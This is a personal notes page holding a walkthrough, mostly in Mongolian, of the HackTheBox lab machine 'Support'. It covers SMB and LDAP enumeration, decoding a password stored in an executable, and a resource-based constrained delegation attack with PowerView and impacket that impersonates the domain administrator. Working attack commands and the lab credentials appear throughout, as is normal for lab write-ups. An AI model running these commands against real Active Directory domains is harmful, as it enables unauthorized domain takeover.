fg0x0's notes
  • 👀Introduction
    • 🏴‍☠️About me
  • 👾offensive-security
    • 🐲OSCP
      • 🛡️Active Directory ( OSCP )
    • ⛓️OSEP
    • 🕸️OSWE
    • 🌌PG-Practice
      • 🏴‍☠️Warm UP
        • 🐧ClamAV
        • 🪟Algernon
        • 🪟Helpdesk
      • 🏴‍☠️Get to Work
        • 🪟Hutch
        • 🪟Jacko
        • 🪟Shenzi
        • 🪟Slort
        • 🐧Postfish
        • 🐧Pelican
        • 🐧Quackerjack
        • 🐧Snookums
        • 🐧Sorcerer
        • 🐧Walla
        • 🐧ZenPhoto
        • 🐧Zino
      • 🏴‍☠️Try Harder
        • 🐧Peppo
        • 🐧Sirol
      • 🏴‍☠️Retired Play Machines
  • 🚩Red Team
    • ☢️Active Directory Exploitation
      • ⚔️Domain Enumeration
      • ⚔️Local Privilege Escalation
    • 👿Red Teaming Zero to Hero
    • 👿Red Teaming All The Things
    • 🕸️Web Exploitation
      • ⚔️XSS (Cross-Site Scripting)
      • ⚔️Remote File Inclusion
      • ⚔️HTML smuggling
    • 💀Binary Exploitation
      • ⚔️Buffer Overflow
      • ⚔️Return Oriented Programming ( ROP )
      • ⚔️Binary Security
      • ⚔️Format String Vulnerability
      • ⚔️Registers
    • ☠️Exploit Development
      • ⚔️Macro Shellcode
      • ⚔️Payloads
  • 🏳️Blue Team
    • 🔍Digital Forensics
    • 🔐Cryptography & Math
      • ⚔️OpenSSL
    • ⏪Reverse Engineering
  • 🏴‍☠️ctf
    • 🏇Haruul Zangi
      • 🏴HZ-2018
        • ⚔️Final-Shao Kahn
      • 🏴HZ-2019
        • ⚔️Final-Уртасгасан-Хээээээээээээээээш
        • ⚔️Final-Skywalker-sage-info
        • ⚔️Round-1-Very Secure LDAP
        • ⚔️Round-1-Web Warmup
      • 🏴HZ-2020
        • ⚔️Round-1-websploit1
        • ⚔️Round-1-websploit2
        • ⚔️Round-1-websploit3
      • 🏴HZ-2021
        • ⚔️Final-Screenshot 1,2
        • ⚔️Final-Orb
      • 🏴HZ-2022
        • ⚔️HZ-2022-Final-You Have Been Hacked
        • ⚔️HZ-2022-Final-Breaking News
        • ⚔️HZ-2022-Final-Todo
        • ⚔️HZ-2022-Final-Subway Surfers
        • ⚔️HZ-2022-Round-2-Spike-Boom-!!!
      • 🏴HZ-2023
        • 👻Round-1
        • 👻Round-2
        • 👻Round-3
          • 🦆Ducky Notes
          • 🚋Aylagch
          • 🔻Web Downchecker
          • 🔑Password Manager
      • 🐣HZ-U18-2023
        • 🔍Forensics
        • ☄️Trivia
        • 🕸️Web
        • 🔢Crypto
        • 🌏Misc
      • 🏴HZ-2024
        • Round-1
          • M4th
        • Round-2
          • Enigma
        • Final-Round
          • 💀heavy one ( forensics )
    • 🏴‍☠️Other CTF
      • 🏜️Shambala-2056
        • 🇦🇷Argentina-PWN (pwn1)
        • 🇪🇬Egypt-Forensics (spectre)
      • 🏴‍☠️SICT CTF
        • 🎮null
      • 🌏Asian Cyber Security Challenge
        • 🌏ACSC ( 2023 )
          • 🏴‍☠️Merkle Hellman ( Cryptography )
          • 🏴‍☠️easySSTI ( Web Exploitation )
          • 🏴‍☠️Hardware is not so hard
  • 🧊HackTheBox
    • 🪟Windows Machine
      • 🤕Support
      • ❌Escape
      • ✈️Flight
      • ☢️Active
    • 🐧Linux Machine
    • ☠️Other Platform Machines
      • ⚔️HMV-Alzheimer
      • ⚔️HMV-BaseME
      • ⚔️HMV-doc
    • Web Exploitation
      • 👽Flask SSTI
        • Templated
        • baby interdimensional internet
        • 👽baby todo or not todo
        • Slippy ( Jinja2 )
      • Injection
        • 👽Phonebook ( LDAP Injection )
        • sanitize ( SQL Injection )
        • Weather app ( SQL Injection )
        • Intergalactic Post ( php filter SQLi )
        • C.O.P ( SQL injection + Revshell )
      • 💥Prototype Pollution
        • ☠️baby breaking grad
      • 😵‍💫insecure deserialization
        • 👽baby website rick ( insecure deserialization )
      • XSS
        • 👽Full Stack Conf (Cross-Site Scripting)
        • AbuseHumandb ( XSS Puppeteer )
        • Kryptos Support ( XSS+IDOR )
        • Felonious Forums ( XSS, Cache Poison, Directory Traversal )
      • 👾Symfony
        • 💀baby bonechewercon ( Symfony )
      • 👥XXE
        • 🤙baby WAFfles order
      • Ping submit hiideg
        • Looking Glass ( Ping )
      • RCE
        • LoveTok ( RCE )
        • Neonify ( RCE )
        • Amidst Us ( image+RCE )
        • Letter Despair ( PHP + RCE )
        • Debugger Unchained ( SQLi+RCE )
      • LFI
        • toxic ( LFI )
      • File Upload
        • petpet rcbee ( file upload )
      • URL submit hiideg
        • baby CachedView ( URL submit hiideg )
      • Invoice ilgeedeg
        • Blinker Fluids
      • HTTP2 smuggling
        • PhishTale ( HTTP2 smuggling, Twig N-Day )
    • Forensics
  • 💀Synack Red Team
  • dursamj
Powered by GitBook
On this page
  1. HackTheBox
  2. Windows Machine

Support

Kerberos Exploit, LDAP enumeration, Windows Fuzzing

PreviousWindows MachineNextEscape

Last updated 1 year ago

Би ерөнхийдөө хурдан мэдээлэл олж авах зорилгоор rustscan ашиглаж скандах дуртай

rustscan -a support.htb --ulimit 5000 -b 2000

Open 10.10.11.174:53
Open 10.10.11.174:88
Open 10.10.11.174:135
Open 10.10.11.174:139
Open 10.10.11.174:389
Open 10.10.11.174:445
Open 10.10.11.174:464
Open 10.10.11.174:593
Open 10.10.11.174:636
Open 10.10.11.174:3269
Open 10.10.11.174:3268
Open 10.10.11.174:5985
Open 10.10.11.174:9389
Open 10.10.11.174:49664
Open 10.10.11.174:49668
Open 10.10.11.174:49670
Open 10.10.11.174:49675
Open 10.10.11.174:49699
Open 10.10.11.174:52273

445 буюу SMB онгорхой байсан учраас smbclient-г ашиглаж share дотор байгаа хэрэглэгчдийн мэдээллийг олж авсан

smbclient -L support.htb -N

Enumeration хийхэд олдсон support-tools хавтасыг нэмэлтээр оруулж дахин хандалт хийж үзнэ

smbclient //support.htb/support-tools -N

Ерөнхийдөө бүх файлыг нь mget * гэх мэтээр татаж үзсэн бөгөөд UserInfo.exe.zip дотор нууц мэдээллүүд байсан

Zip файлыг задлаад үзвэл дотор нь UserInfo.exe буюу Executable шууд ажиллуулах боломжтой файл байв

Энэхүү .exe файлаа задлаад үзвэл дотор нь Protected , LDAPQuery хэсэгт getPassword, enc_password, key гэсэн сэжигтэй 3 хэсэг харагдав

enc_password хэсгийг харвал дотор нь ямар шифрлэлт нь мэдэгдэхгүй сонин тэмдэгтүүд агуулсан нууц үг байв

private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

key хэсгийг харвал шифрлэлтийн түлхүүр байх бөгөөд armando гэдэг string төрөлтэй байв

Онлайнаар тайлах гэж нилээн үзсэн боловч амжилтыг эс олсон учраас эхлээд base64-оор тайлаад нэг бүрчлэн массивт хувааж байгаад join хийж үзэв

Ямар ч байсан human-readable текст гарч ирсэн бөгөөд энэхүү үр дүнг ашиглаад LDAP enumeration хийх боломжтой

Domain дотроосоо LDAPsearch хийгээд username-д харгалзах нууц үгийг олох боломжтой Ironside47pleasure40Watchful

LDAP-аас хэрэглэгчдийн нэрийг түүж аваад user.txt файл болгоод бидний олсон нууц үгтэй зөв харгалзах нэрийг олно 

New-MachineAccount -MachineAccount fg0x0 -Password $(ConvertTo-SecureString 'fg0x0' -AsPlainText -Force) -Verbose
Get-DomainComputer fg0x0
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5601)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity'

impacket ашиглаад kerberos ticket үүсгэх боломжтой харин үүсгэхдээ domain-г /etc/hosts дотроо нэмж өгөхөө мартваа

impacket-getST support.htb/fg0x0:fg0x0 -dc-ip support.htb -impersonate administrator -spn www/dc.support.htb

export KRB5CCNAME=administrator.ccache

impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k

🧊
🪟
🤕
LogoGitHub - RustScan/RustScan: 🤖 The Modern Port Scanner 🤖GitHub
LogoPowerSploit/PowerView.ps1 at master · PowerShellMafia/PowerSploitGitHub
Түлхүүр нь "armando"
Ironside47pleasure40Watchful
username: support
finally got user.txt
Finally you got root privilege
Page cover image